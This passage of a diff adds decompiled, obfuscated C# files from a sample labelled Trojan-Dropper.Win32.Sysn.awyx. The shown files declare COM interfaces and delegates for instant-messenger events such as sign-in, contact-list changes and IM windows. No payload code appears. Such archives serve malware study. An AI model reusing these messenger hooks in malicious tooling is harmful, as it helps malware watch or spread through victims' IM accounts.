+    public virtual extern void remove_OnMyStatusChange([In] \u0001 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnMyPhoneChange([In] \u0006.\u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnMyPhoneChange([In] \u0006.\u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnMyPropertyChange([In] \u0006.\u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnMyPropertyChange([In] \u0006.\u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactFriendlyNameChange([In] \u0006.\u0004 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactFriendlyNameChange([In] \u0006.\u0004 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactStatusChange([In] \u0006.\u0005 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactStatusChange([In] \u0006.\u0005 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactPropertyChange([In] \u0006.\u0006 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactPropertyChange([In] \u0006.\u0006 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactBlockChange([In] \u0006.\u0007 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactBlockChange([In] \u0006.\u0007 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactPagerChange([In] \u0008 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactPagerChange([In] \u0008 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnContactPhoneChange([In] \u0001 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnContactPhoneChange([In] \u0001 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnUnreadEmailChange([In] \u0007.\u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnUnreadEmailChange([In] \u0007.\u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void add_OnEmoticonListChange([In] \u0007.\u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    public virtual extern void remove_OnEmoticonListChange([In] \u0007.\u0003 obj0);
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0004/Token2000076.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token2000076
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0004
+{
+  internal class Token2000076 : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0004/_0001.cs

@@ -0,0 +1,226 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0004;
+using \u0005;
+using \u0006;
+using \u0007;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+namespace \u0004
+{
+  internal interface \u0001
+  {
+    event \u0002 OnGroupAdded;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnGroupAdded([In] \u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnGroupAdded([In] \u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnGroupRemoved([In] \u0003 obj0);
+
+    event \u0003 OnGroupRemoved;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnGroupRemoved([In] \u0003 obj0);
+
+    event \u0004.\u0004 OnGroupNameChanged;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnGroupNameChanged([In] \u0004.\u0004 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnGroupNameChanged([In] \u0004.\u0004 obj0);
+
+    event \u0004.\u0005 OnContactAddedToGroup;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactAddedToGroup([In] \u0004.\u0005 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactAddedToGroup([In] \u0004.\u0005 obj0);
+
+    event \u0004.\u0006 OnContactRemovedFromGroup;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactRemovedFromGroup([In] \u0004.\u0006 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactRemovedFromGroup([In] \u0004.\u0006 obj0);
+
+    event \u0004.\u0007 OnIMWindowCreated;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnIMWindowCreated([In] \u0004.\u0007 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnIMWindowCreated([In] \u0004.\u0007 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnIMWindowDestroyed([In] \u0008 obj0);
+
+    event \u0008 OnIMWindowDestroyed;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnIMWindowDestroyed([In] \u0008 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnIMWindowContactAdded([In] \u0001 obj0);
+
+    event \u0001 OnIMWindowContactAdded;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnIMWindowContactAdded([In] \u0001 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnIMWindowContactRemoved([In] \u0002 obj0);
+
+    event \u0002 OnIMWindowContactRemoved;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnIMWindowContactRemoved([In] \u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnAppShutdown([In] \u0003 obj0);
+
+    event \u0003 OnAppShutdown;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnAppShutdown([In] \u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnSignin([In] \u0005.\u0004 obj0);
+
+    event \u0005.\u0004 OnSignin;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnSignin([In] \u0005.\u0004 obj0);
+
+    event \u0005.\u0005 OnSignout;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnSignout([In] \u0005.\u0005 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnSignout([In] \u0005.\u0005 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactListAdd([In] \u0005.\u0006 obj0);
+
+    event \u0005.\u0006 OnContactListAdd;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactListAdd([In] \u0005.\u0006 obj0);
+
+    event \u0005.\u0007 OnContactListRemove;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactListRemove([In] \u0005.\u0007 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactListRemove([In] \u0005.\u0007 obj0);
+
+    event \u0008 OnMyFriendlyNameChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnMyFriendlyNameChange([In] \u0008 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnMyFriendlyNameChange([In] \u0008 obj0);
+
+    event \u0001 OnMyStatusChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnMyStatusChange([In] \u0001 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnMyStatusChange([In] \u0001 obj0);
+
+    event \u0002 OnMyPhoneChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnMyPhoneChange([In] \u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnMyPhoneChange([In] \u0002 obj0);
+
+    event \u0003 OnMyPropertyChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnMyPropertyChange([In] \u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnMyPropertyChange([In] \u0003 obj0);
+
+    event \u0006.\u0004 OnContactFriendlyNameChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactFriendlyNameChange([In] \u0006.\u0004 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactFriendlyNameChange([In] \u0006.\u0004 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactStatusChange([In] \u0006.\u0005 obj0);
+
+    event \u0006.\u0005 OnContactStatusChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactStatusChange([In] \u0006.\u0005 obj0);
+
+    event \u0006.\u0006 OnContactPropertyChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactPropertyChange([In] \u0006.\u0006 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactPropertyChange([In] \u0006.\u0006 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactBlockChange([In] \u0006.\u0007 obj0);
+
+    event \u0006.\u0007 OnContactBlockChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactBlockChange([In] \u0006.\u0007 obj0);
+
+    event \u0008 OnContactPagerChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactPagerChange([In] \u0008 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactPagerChange([In] \u0008 obj0);
+
+    event \u0001 OnContactPhoneChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnContactPhoneChange([In] \u0001 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnContactPhoneChange([In] \u0001 obj0);
+
+    event \u0002 OnUnreadEmailChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnUnreadEmailChange([In] \u0002 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnUnreadEmailChange([In] \u0002 obj0);
+
+    event \u0003 OnEmoticonListChange;
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void add_OnEmoticonListChange([In] \u0003 obj0);
+
+    [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime)]
+    void remove_OnEmoticonListChange([In] \u0003 obj0);
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0004/_0002.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0004
+{
+  internal delegate void \u0002([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pMGroup);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0004/_0003.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0004
+{
+  internal delegate void \u0003([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pMGroup);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0004/_0004.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0004
+{
+  internal delegate void \u0004([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pMGroup);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0004/_0005.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0004
+{
+  internal delegate void \u0005([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pMGroup, [MarshalAs(UnmanagedType.IDispatch), In] object pMContact);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0004/_0006.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0004
+{
+  internal delegate void \u0006([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pMGroup, [MarshalAs(UnmanagedType.IDispatch), In] object pMContact);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0004/_0007.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0004
+{
+  internal delegate void \u0007([MarshalAs(UnmanagedType.IDispatch), In] object pIMWindow);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0004/_0008.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0004
+{
+  internal delegate void \u0008([MarshalAs(UnmanagedType.IDispatch), In] object pIMWindow);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0005/Token2000077.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token2000077
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0005
+{
+  internal class Token2000077 : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0005/_0001.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0005
+{
+  internal delegate void \u0001([MarshalAs(UnmanagedType.IDispatch), In] object pContact, [MarshalAs(UnmanagedType.IDispatch), In] object pIMWindow);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0005/_0002.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0005
+{
+  internal delegate void \u0002([MarshalAs(UnmanagedType.IDispatch), In] object pContact, [MarshalAs(UnmanagedType.IDispatch), In] object pIMWindow);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0005/_0003.cs

@@ -0,0 +1,10 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0005
+{
+  internal delegate void \u0003();
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0005/_0004.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0005
+{
+  internal delegate void \u0004([In] int hr);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0005/_0005.cs

@@ -0,0 +1,10 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0005
+{
+  internal delegate void \u0005();
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0005/_0006.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0005
+{
+  internal delegate void \u0006([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pMContact);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0005/_0007.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0005
+{
+  internal delegate void \u0007([In] int hr, [MarshalAs(UnmanagedType.IDispatch), In] object pMContact);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0005/_0008.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using System.Runtime.InteropServices;
+
+namespace \u0005
+{
+  internal delegate void \u0008([In] int hr, [MarshalAs(UnmanagedType.BStr), In] string bstrPrevFriendlyName);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0006/Token2000078.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token2000078
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u0006
+{
+  internal class Token2000078 : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0006/_0001.cs

@@ -0,0 +1,13 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0002;
+using System.Runtime.InteropServices;
+
+namespace \u0006
+{
+  internal delegate void \u0001([In] int hr, [In] \u0007 mMyStatus);
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0006/_0002.cs

@@ -0,0 +1,13 @@
+// Decompiled with JetBrains decompiler
